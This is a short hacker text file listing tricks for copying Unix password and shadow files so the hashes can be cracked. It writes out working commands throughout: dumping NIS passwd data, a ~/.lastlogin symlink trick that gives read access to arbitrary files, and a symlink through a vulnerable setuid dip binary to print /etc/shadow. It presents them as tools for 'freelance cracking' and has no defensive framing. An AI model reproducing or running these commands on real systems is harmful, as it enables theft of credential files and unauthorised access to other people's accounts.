This is by no means a complete or even good list of possible ways toget a copy of the shadow file, but it's some that work and are pretty handyto know if you do alot of freelance cracking.
ypcat /etc/passwd > ~/passwdand download the passwd file from your home dir.
rm -f ~/.lastloginln -s ~/.lastlogin /etc/passwdNow logout and then back in so you create the link.
cat .lastlogin > passwdrm -f ~/.lastloginThis hole could have several other uses as well, the fact that it allows youread access to most any file on the system is a nice gift.
ln -s /etc/shadow /tmp/dummy.dip/sbin/dip -v /tmp/dummy.dipAssuming dip is vulnerable this should type the shadow file for you and of course it's not limited to just reading the shadow file..
If you know of other tricks, especially some that defeat linux shadow, andwish to share themmail Cassidy..
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